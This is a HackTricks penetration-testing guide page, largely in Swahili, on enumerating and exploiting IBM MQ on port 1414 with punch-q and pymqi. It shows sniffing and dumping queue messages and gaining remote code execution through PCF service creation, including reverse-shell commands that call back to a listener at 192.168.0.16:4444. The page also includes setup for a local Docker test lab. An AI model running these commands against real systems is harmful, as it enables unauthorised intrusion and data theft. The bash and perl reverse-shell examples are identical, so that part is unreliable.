hacktricks/network-services-pentesting/1414-pentesting-ibmmq.md

343 lines
18 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 1414 - Pentesting IBM MQ
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
## Basic information
IBM MQ ni teknolojia ya IBM ya kusimamia foleni za ujumbe. Kama teknolojia nyingine za **message broker**, inakusudia kupokea, kuhifadhi, kuchakata na kuainisha taarifa kati ya wazalishaji na watumiaji.
Kwa kawaida, **inaonyesha bandari ya TCP ya IBM MQ 1414**. Wakati mwingine, API ya HTTP REST inaweza kuonyeshwa kwenye bandari **9443**. Vipimo (Prometheus) vinaweza pia kufikiwa kutoka bandari ya TCP **9157**.
Bandari ya TCP ya IBM MQ 1414 inaweza kutumika kudhibiti ujumbe, foleni, kanali, ... lakini **pia kudhibiti mfano**.
IBM inatoa hati kubwa ya kiufundi inayopatikana kwenye [https://www.ibm.com/docs/en/ibm-mq](https://www.ibm.com/docs/en/ibm-mq).
## Tools
Zana inayopendekezwa kwa matumizi rahisi ni **[punch-q](https://github.com/sensepost/punch-q)**, kwa matumizi ya Docker. Zana hii inatumia maktaba ya Python `pymqi`.
Kwa njia ya zaidi ya mikono, tumia maktaba ya Python **[pymqi](https://github.com/dsuch/pymqi)**. [IBM MQ dependencies](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc) zinahitajika.
### Installing pymqi
**IBM MQ dependencies** zinahitaji kusanikishwa na kupakiwa:
1. Unda akaunti (IBMid) kwenye [https://login.ibm.com/](https://login.ibm.com/).
2. Pakua maktaba za IBM MQ kutoka [https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc](https://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm%7EWebSphere&product=ibm/WebSphere/WebSphere+MQ&release=9.0.0.4&platform=All&function=fixId&fixids=9.0.0.4-IBM-MQC-*,9.0.0.4-IBM-MQ-Install-Java-All,9.0.0.4-IBM-MQ-Java-InstallRA&useReleaseAsTarget=true&includeSupersedes=0&source=fc). Kwa Linux x86_64 ni **9.0.0.4-IBM-MQC-LinuxX64.tar.gz**.
3. Fanya dekompresi (`tar xvzf 9.0.0.4-IBM-MQC-LinuxX64.tar.gz`).
4. Endesha `sudo ./mqlicense.sh` kukubali masharti ya leseni.
>If you are under Kali Linux, modify the file `mqlicense.sh`: remove/comment the following lines (between lines 105-110):
>
>```bash
>if [ ${BUILD_PLATFORM} != `uname`_`uname ${UNAME_FLAG}` ]
> then
> echo "ERROR: This package is incompatible with this system"
> echo " This package was built for ${BUILD_PLATFORM}"
> exit 1
>fi
>```
5. Sanidha hizi pakiti:
```bash
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesRuntime-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesClient-9.0.0-4.x86_64.rpm
sudo rpm --prefix /opt/mqm -ivh --nodeps --force-debian MQSeriesSDK-9.0.0-4.x86_64.rpm
```
6. Kisha, ongeza kwa muda faili za `.so` kwenye LD: `export LD_LIBRARY_PATH=/opt/mqm/lib64`, **kabla** ya kutumia zana nyingine zinazotumia utegemezi hizi.
Kisha, unaweza kunakili mradi [**pymqi**](https://github.com/dsuch/pymqi): ina vipande vya msimbo vya kuvutia, constants, ... Au unaweza kufunga maktaba moja kwa moja kwa: `pip install pymqi`.
### Kutumia punch-q
#### Kwa Docker
Tumia tu: `sudo docker run --rm -ti leonjza/punch-q`.
#### Bila Docker
Nakili mradi [**punch-q**](https://github.com/sensepost/punch-q) kisha fuata readme kwa ajili ya usakinishaji (`pip install -r requirements.txt && python3 setup.py install`).
Baada ya hapo, inaweza kutumika na amri `punch-q`.
## Enumeration
Unaweza kujaribu kuorodhesha **jina la meneja wa foleni, watumiaji, vituo na foleni** kwa kutumia **punch-q** au **pymqi**.
### Meneja wa Foleni
Wakati mwingine, hakuna ulinzi dhidi ya kupata jina la Meneja wa Foleni:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 discover name
Queue Manager name: MYQUEUEMGR
```
### Channels
**punch-q** inatumia orodha ya maneno ya ndani (inayoweza kubadilishwa) kutafuta vituo vilivyopo. Mfano wa matumizi:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd discover channels
"DEV.ADMIN.SVRCONN" exists and was authorised.
"SYSTEM.AUTO.SVRCONN" might exist, but user was not authorised.
"SYSTEM.DEF.SVRCONN" might exist, but user was not authorised.
```
Inatokea kwamba baadhi ya mifano ya IBM MQ zinakubali maombi ya MQ **yasiyo na uthibitisho**, hivyo `--username / --password` hazihitajiki. Kwa hakika, haki za ufikiaji pia zinaweza kutofautiana.
Pale tunapopata jina moja la channel (hapa: `DEV.ADMIN.SVRCONN`), tunaweza kuhesabu channel zingine zote.
Hesabu hiyo inaweza kufanywa kimsingi na kipande hiki cha msimbo `code/examples/dis_channels.py` kutoka **pymqi**:
```python
import logging
import pymqi
logging.basicConfig(level=logging.INFO)
queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'
prefix = '*'
args = {pymqi.CMQCFC.MQCACH_CHANNEL_NAME: prefix}
qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)
try:
response = pcf.MQCMD_INQUIRE_CHANNEL(args)
except pymqi.MQMIError as e:
if e.comp == pymqi.CMQC.MQCC_FAILED and e.reason == pymqi.CMQC.MQRC_UNKNOWN_OBJECT_NAME:
logging.info('No channels matched prefix `%s`' % prefix)
else:
raise
else:
for channel_info in response:
channel_name = channel_info[pymqi.CMQCFC.MQCACH_CHANNEL_NAME]
logging.info('Found channel `%s`' % channel_name)
qmgr.disconnect()
```
... Lakini **punch-q** pia inaingiza sehemu hiyo (ikiwa na maelezo zaidi!).
Inaweza kuzinduliwa na:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show channels -p '*'
Showing channels with prefix: "*"...
| Name | Type | MCA UID | Conn Name | Xmit Queue | Description | SSL Cipher |
|----------------------|-------------------|---------|-----------|------------|-----------------|------------|
| DEV.ADMIN.SVRCONN | Server-connection | | | | | |
| DEV.APP.SVRCONN | Server-connection | app | | | | |
| SYSTEM.AUTO.RECEIVER | Receiver | | | | Auto-defined by | |
| SYSTEM.AUTO.SVRCONN | Server-connection | | | | Auto-defined by | |
| SYSTEM.DEF.AMQP | AMQP | | | | | |
| SYSTEM.DEF.CLUSRCVR | Cluster-receiver | | | | | |
| SYSTEM.DEF.CLUSSDR | Cluster-sender | | | | | |
| SYSTEM.DEF.RECEIVER | Receiver | | | | | |
| SYSTEM.DEF.REQUESTER | Requester | | | | | |
| SYSTEM.DEF.SENDER | Sender | | | | | |
| SYSTEM.DEF.SERVER | Server | | | | | |
| SYSTEM.DEF.SVRCONN | Server-connection | | | | | |
| SYSTEM.DEF.CLNTCONN | Client-connection | | | | | |
```
### Queues
Kuna kipande cha msimbo chenye **pymqi** (`dis_queues.py`) lakini **punch-q** inaruhusu kupata vipande zaidi vya taarifa kuhusu foleni:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN show queues -p '*'
Showing queues with prefix: "*"...
| Created | Name | Type | Usage | Depth | Rmt. QM | Rmt. Qu | Description |
| | | | | | GR Name | eue Nam | |
| | | | | | | e | |
|-----------|----------------------|--------|---------|--------|---------|---------|-----------------------------------|
| 2023-10-1 | DEV.DEAD.LETTER.QUEU | Local | Normal | 0 | | | |
| 0 18.35.1 | E | | | | | | |
| 9 | | | | | | | |
| 2023-10-1 | DEV.QUEUE.1 | Local | Normal | 0 | | | |
| 0 18.35.1 | | | | | | | |
| 9 | | | | | | | |
| 2023-10-1 | DEV.QUEUE.2 | Local | Normal | 0 | | | |
| 0 18.35.1 | | | | | | | |
| 9 | | | | | | | |
| 2023-10-1 | DEV.QUEUE.3 | Local | Normal | 0 | | | |
| 0 18.35.1 | | | | | | | |
| 9 | | | | | | | |
# Truncated
```
## Exploit
### Dump messages
Unaweza kulenga foleni(s)/kanali(s) ili kunusa / kutupa ujumbe kutoka kwao (operesheni isiyo na uharibifu). *Examples:*
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages sniff
```
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN messages dump
```
**Usisite kurudia kwenye foleni zote zilizotambuliwa.**
### Utekelezaji wa msimbo
> Maelezo machache kabla ya kuendelea: IBM MQ inaweza kudhibitiwa kwa njia nyingi: MQSC, PCF, Command ya Kudhibiti. Orodha za jumla zinaweza kupatikana katika [nyaraka za IBM MQ](https://www.ibm.com/docs/en/ibm-mq/9.2?topic=reference-command-sets-comparison).
> [**PCF**](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=commands-introduction-mq-programmable-command-formats) (***Mifumo ya Amri Inayoweza Kuprogramishwa***) ndiyo tunayoangazia ili kuingiliana kwa mbali na mfano. **punch-q** na zaidi **pymqi** zinategemea mwingiliano wa PCF.
>
> Unaweza kupata orodha ya amri za PCF:
> * [Kutoka kwa nyaraka za PCF](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=reference-definitions-programmable-command-formats), na
> * [kutoka kwa constants](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqcmd-command-codes).
>
> Amri moja ya kuvutia ni `MQCMD_CREATE_SERVICE` na nyaraka zake zinapatikana [hapa](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-change-copy-create-service-multiplatforms). Inachukua kama hoja `StartCommand` inayotaja programu ya ndani kwenye mfano (mfano: `/bin/sh`).
>
> Pia kuna onyo la amri katika nyaraka: *"Kumbuka: Amri hii inaruhusu mtumiaji kuendesha amri yoyote kwa mamlaka ya mqm. Ikiwa haki za kutumia amri hii zitatolewa, mtumiaji mbaya au asiye makini anaweza kufafanua huduma ambayo inaharibu mifumo yako au data, kwa mfano, kwa kufuta faili muhimu."*
>
> *Kumbuka: kila wakati kulingana na nyaraka za IBM MQ (Marejeo ya Usimamizi), pia kuna kiunganishi cha HTTP kwenye `/admin/action/qmgr/{qmgrName}/mqsc` ili kuendesha amri sawa ya MQSC kwa ajili ya uundaji wa huduma (`DEFINE SERVICE`). Kipengele hiki hakijajadiliwa hapa bado.*
Uundaji / kufuta huduma kwa PCF kwa ajili ya utekelezaji wa programu ya mbali unaweza kufanywa na **punch-q**:
**Mfano 1**
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/sh" --args "-c id"
```
> Katika kumbukumbu za IBM MQ, unaweza kusoma amri imefanikiwa kutekelezwa:
>
> ```bash
> 2023-10-10T19:13:01.713Z AMQ5030I: Amri '808544aa7fc94c48' imeanza. ProcessId(618). [ArithInsert1(618), CommentInsert1(808544aa7fc94c48)]
> ```
Unaweza pia kuhesabu programu zilizopo kwenye mashine (hapa `/bin/doesnotexist` ... haipo):
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command execute --cmd "/bin/doesnotexist" --arg
s "whatever"
Command: /bin/doesnotexist
Arguments: -c id
Service Name: 6e3ef5af652b4436
Creating service...
Starting service...
The program '/bin/doesnotexist' is not available on the remote system.
Giving the service 0 second(s) to live...
Cleaning up service...
Done
```
**Kumbuka kwamba uzinduzi wa programu ni wa asenkroni. Hivyo unahitaji kipengele cha pili ili kutumia exploit** ***(listener kwa ajili ya reverse shell, uundaji wa faili kwenye huduma tofauti, uhamasishaji wa data kupitia mtandao ...)**
**Mfano wa 2**
Kwa reverse shell rahisi, **punch-q** inapendekeza pia payloads mbili za reverse shell:
* Moja na bash
* Moja na perl
*Kwa hakika unaweza kujenga moja maalum kwa kutumia amri ya `execute`.*
Kwa bash:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
```
Kwa perl:
```bash
sudo docker run --rm -ti leonjza/punch-q --host 172.17.0.2 --port 1414 --username admin --password passw0rd --channel DEV.ADMIN.SVRCONN command reverse -i 192.168.0.16 -p 4444
```
### Custom PCF
Unaweza kuchimba katika nyaraka za IBM MQ na kutumia moja kwa moja maktaba ya **pymqi** ya python ili kujaribu amri maalum za PCF ambazo hazijatekelezwa katika **punch-q**.
**Example:**
```python
import pymqi
queue_manager = 'MYQUEUEMGR'
channel = 'DEV.ADMIN.SVRCONN'
host = '172.17.0.2'
port = '1414'
conn_info = '%s(%s)' % (host, port)
user = 'admin'
password = 'passw0rd'
qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
pcf = pymqi.PCFExecute(qmgr)
try:
# Replace here with your custom PCF args and command
# The constants can be found in pymqi/code/pymqi/CMQCFC.py
args = {pymqi.CMQCFC.xxxxx: "value"}
response = pcf.MQCMD_CUSTOM_COMMAND(args)
except pymqi.MQMIError as e:
print("Error")
else:
# Process response
qmgr.disconnect()
```
Ikiwa huwezi kupata majina ya kudumu, unaweza kurejelea [nyaraka za IBM MQ](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=constants-mqca-character-attribute-selectors).
> *Mfano wa [`MQCMD_REFRESH_CLUSTER`](https://www.ibm.com/docs/en/ibm-mq/9.3?topic=formats-mqcmd-refresh-cluster-refresh-cluster) (Decimal = 73). Inahitaji parameter `MQCA_CLUSTER_NAME` (Decimal = 2029) ambayo inaweza kuwa `*` (Doc: ):*
>
> ```python
> import pymqi
>
> queue_manager = 'MYQUEUEMGR'
> channel = 'DEV.ADMIN.SVRCONN'
> host = '172.17.0.2'
> port = '1414'
> conn_info = '%s(%s)' % (host, port)
> user = 'admin'
> password = 'passw0rd'
>
> qmgr = pymqi.connect(queue_manager, channel, conn_info, user, password)
> pcf = pymqi.PCFExecute(qmgr)
>
> try:
> args = {2029: "*"}
> response = pcf.MQCMD_REFRESH_CLUSTER(args)
> except pymqi.MQMIError as e:
> print("Error")
> else:
> print(response)
>
> qmgr.disconnect()
> ```
## Mazingira ya kupima
Ikiwa unataka kupima tabia na matumizi ya IBM MQ, unaweza kuunda mazingira ya ndani kulingana na Docker:
1. Kuwa na akaunti kwenye ibm.com na cloud.ibm.com.
2. Unda IBM MQ iliyowekwa kwenye kontena na:
```bash
sudo docker pull icr.io/ibm-messaging/mq:9.3.2.0-r2
sudo docker run -e LICENSE=accept -e MQ_QMGR_NAME=MYQUEUEMGR -p1414:1414 -p9157:9157 -p9443:9443 --name testing-ibmmq icr.io/ibm-messaging/mq:9.3.2.0-r2
```
Kwa default, uthibitishaji umewezeshwa, jina la mtumiaji ni `admin` na nenosiri ni `passw0rd` (Kigezo cha mazingira `MQ_ADMIN_PASSWORD`). Hapa, jina la meneja wa foleni limewekwa kuwa `MYQUEUEMGR` (kigezo `MQ_QMGR_NAME`).
Unapaswa kuwa na IBM MQ ikifanya kazi na bandari zake zikiwa wazi:
```bash
sudo docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
58ead165e2fd icr.io/ibm-messaging/mq:9.3.2.0-r2 "runmqdevserver" 3 seconds ago Up 3 seconds 0.0.0.0:1414->1414/tcp, 0.0.0.0:9157->9157/tcp, 0.0.0.0:9443->9443/tcp testing-ibmmq
```
> Toleo la zamani la picha za IBM MQ docker ziko kwenye: https://hub.docker.com/r/ibmcom/mq/.
## References
* [mgeeky's gist - "Practical IBM MQ Penetration Testing notes"](https://gist.github.com/mgeeky/2efcd86c62f0fb3f463638911a3e89ec)
* [MQ Jumping - DEFCON 15](https://defcon.org/images/defcon-15/dc15-presentations/dc-15-ruks.pdf)
* [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq)